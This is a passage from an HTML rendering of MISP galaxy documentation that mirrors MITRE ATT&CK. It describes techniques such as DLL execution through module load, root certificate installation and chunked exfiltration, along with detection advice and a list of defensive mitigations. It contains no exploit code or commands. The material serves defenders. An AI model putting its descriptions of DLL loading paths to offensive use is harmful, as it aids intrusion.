<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/windows-server-docs/identity/ad-ds/get-started/windows-time-service/windows-time-service-tools-and-settings">https://technet.microsoft.com/windows-server-docs/identity/ad-ds/get-started/windows-time-service/windows-time-service-tools-and-settings</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/ms724961.aspx">https://msdn.microsoft.com/ms724961.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rsaconference.com/writable/presentations/file%20upload/ht-209%20rivner%20schwartz.pdf">https://www.rsaconference.com/writable/presentations/file%20upload/ht-209%20rivner%20schwartz.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_execution_through_module_load"><a class="anchor" href="#_execution_through_module_load"></a><a class="link" href="#_execution_through_module_load">Execution through Module Load</a></h3>
<div class="paragraph">
<p>The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess(), LoadLibrary(), etc. of the Win32 API.[[Citation: Wikipedia Windows Library Files]]</p>
</div>
<div class="paragraph">
<p>The module loader can load DLLs:</p>
</div>
<div class="paragraph">
<p>*via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;</p>
</div>
<div class="paragraph">
<p>*via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);</p>
</div>
<div class="paragraph">
<p>*via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;</p>
</div>
<div class="paragraph">
<p>*via &lt;code&gt;&lt;file name="filename.extension" loadFrom="fully-qualified or relative pathname"&gt;&lt;/code&gt; in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.</p>
</div>
<div class="paragraph">
<p>Adversaries can use this functionality as a way to execute arbitrary code on a system.</p>
</div>
<div class="paragraph">
<p>Detection: Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to &lt;code&gt;%SystemRoot%&lt;/code&gt; and &lt;code&gt;%ProgramFiles%&lt;/code&gt; directories will protect against module loads from unsafe paths.</p>
</div>
<div class="paragraph">
<p>Correlation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Process Monitoring, API monitoring, File monitoring, DLL monitoring</p>
</div>
<div class="paragraph">
<p>Contributors: Stefan Kanthak</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 719. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1129">https://attack.mitre.org/wiki/Technique/T1129</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Microsoft%20Windows%20library%20files">https://en.wikipedia.org/wiki/Microsoft%20Windows%20library%20files</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_install_root_certificate"><a class="anchor" href="#_install_root_certificate"></a><a class="link" href="#_install_root_certificate">Install Root Certificate</a></h3>
<div class="paragraph">
<p>Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root&#8217;s chain of trust that have been signed by the root certificate.[[Citation: Wikipedia Root Certificate]] Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.</p>
</div>
<div class="paragraph">
<p>Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.[[Citation: Operation Emmental]]</p>
</div>
<div class="paragraph">
<p>Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications.[[Citation: Kaspersky Superfish]]</p>
</div>
<div class="paragraph">
<p>Detection: A system&#8217;s root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: SSL/TLS inspection, Digital Certificate Logs</p>
</div>
<div class="paragraph">
<p>Contributors: Itzik Kotler, SafeBreach</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 720. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1130">https://attack.mitre.org/wiki/Technique/T1130</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Root%20certificate">https://en.wikipedia.org/wiki/Root%20certificate</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf">http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://usblog.kaspersky.com/superfish-adware-preinstalled-on-lenovo-laptops/5161/">https://usblog.kaspersky.com/superfish-adware-preinstalled-on-lenovo-laptops/5161/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_data_transfer_size_limits"><a class="anchor" href="#_data_transfer_size_limits"></a><a class="link" href="#_data_transfer_size_limits">Data Transfer Size Limits</a></h3>
<div class="paragraph">
<p>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[Citation: University of Birmingham C2]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Process monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 721. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1030">https://attack.mitre.org/wiki/Technique/T1030</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_course_of_action"><a class="anchor" href="#_course_of_action"></a><a class="link" href="#_course_of_action">Course of Action</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>ATT&amp;CK Mitigation.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Course of Action is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/course" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/course</a> of action.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_login_item_mitigation"><a class="anchor" href="#_login_item_mitigation"></a><a class="link" href="#_login_item_mitigation">Login Item Mitigation</a></h3>
<div class="paragraph">
<p>Restrict users from being able to create their own login items. Additionally, holding the shift key during login prevents apps from opening automatically[[CiteRef::Re-Open windows on Mac]].</p>
</div>
</div>
<div class="sect2">
<h3 id="_component_object_model_hijacking_mitigation"><a class="anchor" href="#_component_object_model_hijacking_mitigation"></a><a class="link" href="#_component_object_model_hijacking_mitigation">Component Object Model Hijacking Mitigation</a></h3>
<div class="paragraph">
<p>Direct mitigation of this technique may not be recommended for a particular environment since COM objects are a legitimate part of the operating system and installed software. Blocking COM object changes may have unforeseen side effects to legitimate functionality.</p>
</div>
<div class="paragraph">
<p>Instead, identify and block potentially malicious software that may execute, or be executed by, this technique using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_exfiltration_over_command_and_control_channel_mitigation"><a class="anchor" href="#_exfiltration_over_command_and_control_channel_mitigation"></a><a class="link" href="#_exfiltration_over_command_and_control_channel_mitigation">Exfiltration Over Command and Control Channel Mitigation</a></h3>
<div class="paragraph">
<p>Mitigations for command and control apply. Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_bash_profile_and_bashrc_mitigation"><a class="anchor" href="#_bash_profile_and_bashrc_mitigation"></a><a class="link" href="#_bash_profile_and_bashrc_mitigation">.bash_profile and .bashrc Mitigation</a></h3>
<div class="paragraph">
<p>Making these files immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.</p>
</div>
</div>
<div class="sect2">
<h3 id="_dll_injection_mitigation"><a class="anchor" href="#_dll_injection_mitigation"></a><a class="link" href="#_dll_injection_mitigation">DLL Injection Mitigation</a></h3>
<div class="paragraph">
<p>Mitigating specific API calls will likely have unintended side effects, such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior.</p>
</div>
<div class="paragraph">
<p>Identify or block potentially malicious software that may contain DLL injection functionality by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_bypass_user_account_control_mitigation"><a class="anchor" href="#_bypass_user_account_control_mitigation"></a><a class="link" href="#_bypass_user_account_control_mitigation">Bypass User Account Control Mitigation</a></h3>
<div class="paragraph">
<p>Remove users from the local administrator group on systems. Although UAC bypass techniques exist, it is still prudent to use the highest enforcement level for UAC when possible and mitigate bypass opportunities that exist with techniques such as [[Technique/T1038|DLL Search Order Hijacking]].</p>
</div>
<div class="paragraph">
<p>Check for common UAC bypass weaknesses on Windows systems to be aware of the risk posture and address issues where appropriate.[[CiteRef::Github UACMe]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_command_line_interface_mitigation"><a class="anchor" href="#_command_line_interface_mitigation"></a><a class="link" href="#_command_line_interface_mitigation">Command-Line Interface Mitigation</a></h3>
<div class="paragraph">
<p>Audit and/or block command-line interpreters by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_dll_search_order_hijacking_mitigation"><a class="anchor" href="#_dll_search_order_hijacking_mitigation"></a><a class="link" href="#_dll_search_order_hijacking_mitigation">DLL Search Order Hijacking Mitigation</a></h3>
<div class="paragraph">
<p>Use auditing tools capable of detecting DLL search order hijacking opportunities on systems within an enterprise and correct them. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for DLL hijacking weaknesses.<a id="CiteRef::Powersploit"></a></p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through search order hijacking by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown DLLs.</p>
</div>
</div>
<div class="sect2">
<h3 id="_uncommonly_used_port_mitigation"><a class="anchor" href="#_uncommonly_used_port_mitigation"></a><a class="link" href="#_uncommonly_used_port_mitigation">Uncommonly Used Port Mitigation</a></h3>
<div class="paragraph">
<p>Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports.</p>
</div>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_regsvcs_regasm_mitigation"><a class="anchor" href="#_regsvcs_regasm_mitigation"></a><a class="link" href="#_regsvcs_regasm_mitigation">Regsvcs/Regasm Mitigation</a></h3>
<div class="paragraph">
<p>Regsvcs and Regasm may not be necessary within a given environment. Block execution of Regsvcs.exe and Regasm.exe if they are not required for a given system or network to prevent potential misuess by adversaries.</p>
</div>
</div>
<div class="sect2">
<h3 id="_application_deployment_software_mitigation"><a class="anchor" href="#_application_deployment_software_mitigation"></a><a class="link" href="#_application_deployment_software_mitigation">Application Deployment Software Mitigation</a></h3>
<div class="paragraph">
<p>Grant access to application deployment systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multifactor authentication. Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network. Patch deployment systems regularly to prevent potential remote access through [[Technique/T1068|Exploitation of Vulnerability]].</p>
</div>
<div class="paragraph">
<p>If the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.</p>
</div>
</div>
<div class="sect2">
<h3 id="_commonly_used_port_mitigation"><a class="anchor" href="#_commonly_used_port_mitigation"></a><a class="link" href="#_commonly_used_port_mitigation">Commonly Used Port Mitigation</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_windows_management_instrumentation_mitigation"><a class="anchor" href="#_windows_management_instrumentation_mitigation"></a><a class="link" href="#_windows_management_instrumentation_mitigation">Windows Management Instrumentation Mitigation</a></h3>
<div class="paragraph">
<p>Disabling WMI or RPCS may cause system instability and should be evaluated to assess the impact to a network. By default, only administrators are allowed to connect remotely using WMI. Restrict other users who are allowed to connect, or disallow all users to connect remotely to WMI. Prevent credential overlap across systems of administrator and privileged accounts.[[CiteRef::FireEye WMI 2015]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_path_interception_mitigation"><a class="anchor" href="#_path_interception_mitigation"></a><a class="link" href="#_path_interception_mitigation">Path Interception Mitigation</a></h3>
<div class="paragraph">
<p>Eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them[[CiteRef::Microsoft CreateProcess]]. Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate[[CiteRef::MSDN DLL Security]]. Clean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries.</p>
</div>
<div class="paragraph">
<p>Periodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations[[CiteRef::Kanthak Sentinel]].</p>
</div>
<div class="paragraph">
<p>Require that all executables be placed in write-protected directories. Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory &lt;code&gt;C:&lt;/code&gt; and system directories, such as &lt;code&gt;C:\Windows\&lt;/code&gt;, to reduce places where malicious files could be placed for execution.</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through the path interception by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies,[[CiteRef::Corio 2008]] that are capable of auditing and/or blocking unknown executables.</p>
</div>
</div>
<div class="sect2">
<h3 id="_graphical_user_interface_mitigation"><a class="anchor" href="#_graphical_user_interface_mitigation"></a><a class="link" href="#_graphical_user_interface_mitigation">Graphical User Interface Mitigation</a></h3>
<div class="paragraph">
<p>Prevent adversaries from gaining access to credentials through [[Credential Access]] that can be used to log into remote desktop sessions on systems.</p>
</div>
<div class="paragraph">
<p>Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to log into remote interactive sessions, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] and Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_ntfs_extended_attributes_mitigation"><a class="anchor" href="#_ntfs_extended_attributes_mitigation"></a><a class="link" href="#_ntfs_extended_attributes_mitigation">NTFS Extended Attributes Mitigation</a></h3>
<div class="paragraph">
<p>It may be difficult or inadvisable to block access to EA. Efforts should be focused on preventing potentially malicious software from running. Identify and block potentially malicious software that may contain functionality to hide information in EA by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_indicator_removal_from_tools_mitigation"><a class="anchor" href="#_indicator_removal_from_tools_mitigation"></a><a class="link" href="#_indicator_removal_from_tools_mitigation">Indicator Removal from Tools Mitigation</a></h3>
<div class="paragraph">
<p>Mitigation is difficult in instances like this because the adversary may have access to the system through another channel and can learn what techniques or tools are blocked by resident defenses. Exercising best practices with configuration and security as well as ensuring that proper process is followed during investigation of potential compromise is essential to detecting a larger intrusion through discrete alerts.</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be used by an adversary by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_clipboard_data_mitigation"><a class="anchor" href="#_clipboard_data_mitigation"></a><a class="link" href="#_clipboard_data_mitigation">Clipboard Data Mitigation</a></h3>
<div class="paragraph">
<p>Instead of blocking software based on clipboard capture behavior, identify potentially malicious software that may contain this functionality, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_registry_run_keys_start_folder_mitigation"><a class="anchor" href="#_registry_run_keys_start_folder_mitigation"></a><a class="link" href="#_registry_run_keys_start_folder_mitigation">Registry Run Keys / Start Folder Mitigation</a></h3>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through run key or startup folder persistence using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_multi_stage_channels_mitigation"><a class="anchor" href="#_multi_stage_channels_mitigation"></a><a class="link" href="#_multi_stage_channels_mitigation">Multi-Stage Channels Mitigation</a></h3>
<div class="paragraph">
<p>Command and control infrastructure used in a multi-stage channel may be blocked if known ahead of time. If unique signatures are present in the C2 traffic, they could also be used as the basis of identifying and blocking the channel.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_hidden_users_mitigation"><a class="anchor" href="#_hidden_users_mitigation"></a><a class="link" href="#_hidden_users_mitigation">Hidden Users Mitigation</a></h3>
<div class="paragraph">
<p>If the computer is domain joined, then group policy can help restrict the ability to create or hide users. Similarly, preventing the modification of the &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; &lt;code&gt;Hide500Users&lt;/code&gt; value will force all users to be visible.</p>
</div>
</div>
<div class="sect2">
<h3 id="_data_staged_mitigation"><a class="anchor" href="#_data_staged_mitigation"></a><a class="link" href="#_data_staged_mitigation">Data Staged Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to collect data from removable media, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_data_from_removable_media_mitigation"><a class="anchor" href="#_data_from_removable_media_mitigation"></a><a class="link" href="#_data_from_removable_media_mitigation">Data from Removable Media Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to collect data from removable media, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_data_from_network_shared_drive_mitigation"><a class="anchor" href="#_data_from_network_shared_drive_mitigation"></a><a class="link" href="#_data_from_network_shared_drive_mitigation">Data from Network Shared Drive Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to collect data from a network share, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_account_manipulation_mitigation"><a class="anchor" href="#_account_manipulation_mitigation"></a><a class="link" href="#_account_manipulation_mitigation">Account Manipulation Mitigation</a></h3>
<div class="paragraph">
<p>Use multifactor authentication. Follow guidelines to prevent or limit adversary access to [[Technique/T1078|Valid Accounts]].</p>
</div>
<div class="paragraph">
<p>Protect domain controllers by ensuring proper security configuration for critical servers. Configure access controls and firewalls to limit access to these systems. Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.</p>
</div>
</div>
<div class="sect2">
<h3 id="_applescript_mitigation"><a class="anchor" href="#_applescript_mitigation"></a><a class="link" href="#_applescript_mitigation">AppleScript Mitigation</a></h3>
<div class="paragraph">
<p>Require that all AppleScript be signed by a trusted developer ID before being executed - this will prevent random AppleScript code from executing.</p>
</div>
</div>
<div class="sect2">
<h3 id="_powershell_mitigation"><a class="anchor" href="#_powershell_mitigation"></a><a class="link" href="#_powershell_mitigation">PowerShell Mitigation</a></h3>
<div class="paragraph">
<p>It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions. When PowerShell is necessary, restrict PowerShell execution policy to administrators and to only execute signed scripts. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration.[[CiteRef::Netspi PowerShell Execution Policy Bypass]] Disable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.</p>
</div>
</div>
<div class="sect2">
<h3 id="_input_prompt_mitigation"><a class="anchor" href="#_input_prompt_mitigation"></a><a class="link" href="#_input_prompt_mitigation">Input Prompt Mitigation</a></h3>
<div class="paragraph">
<p>Users need to be trained to know which programs ask for permission and why. Follow mitigation recommendations for [[Technique/T1155|AppleScript]].</p>
</div>
</div>
<div class="sect2">
<h3 id="_system_information_discovery_mitigation"><a class="anchor" href="#_system_information_discovery_mitigation"></a><a class="link" href="#_system_information_discovery_mitigation">System Information Discovery Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about the operating system and underlying hardware, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_winlogon_helper_dll_mitigation"><a class="anchor" href="#_winlogon_helper_dll_mitigation"></a><a class="link" href="#_winlogon_helper_dll_mitigation">Winlogon Helper DLL Mitigation</a></h3>
<div class="paragraph">
<p>Upgrade the operating system to a newer version of Windows if using a version prior to Vista.</p>
</div>
<div class="paragraph">
<p>Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes.</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through the Winlogon helper process by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown DLLs.</p>
</div>
</div>
<div class="sect2">
<h3 id="_netsh_helper_dll_mitigation"><a class="anchor" href="#_netsh_helper_dll_mitigation"></a><a class="link" href="#_netsh_helper_dll_mitigation">Netsh Helper DLL Mitigation</a></h3>
<div class="paragraph">
<p>Identify and block potentially malicious software that may persist in this manner by using whitelisting[[CiteRef::Beechey 2010]] tools capable of monitoring DLL loads by Windows utilities like AppLocker.[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_network_share_connection_removal_mitigation"><a class="anchor" href="#_network_share_connection_removal_mitigation"></a><a class="link" href="#_network_share_connection_removal_mitigation">Network Share Connection Removal Mitigation</a></h3>
<div class="paragraph">
<p>Follow best practices for mitigation of activity related to establishing [[Technique/T1077|Windows Admin Shares]].</p>
</div>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to leverage network shares, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_connection_proxy_mitigation"><a class="anchor" href="#_connection_proxy_mitigation"></a><a class="link" href="#_connection_proxy_mitigation">Connection Proxy Mitigation</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific C2 protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_hidden_files_and_directories_mitigation"><a class="anchor" href="#_hidden_files_and_directories_mitigation"></a><a class="link" href="#_hidden_files_and_directories_mitigation">Hidden Files and Directories Mitigation</a></h3>
<div class="paragraph">
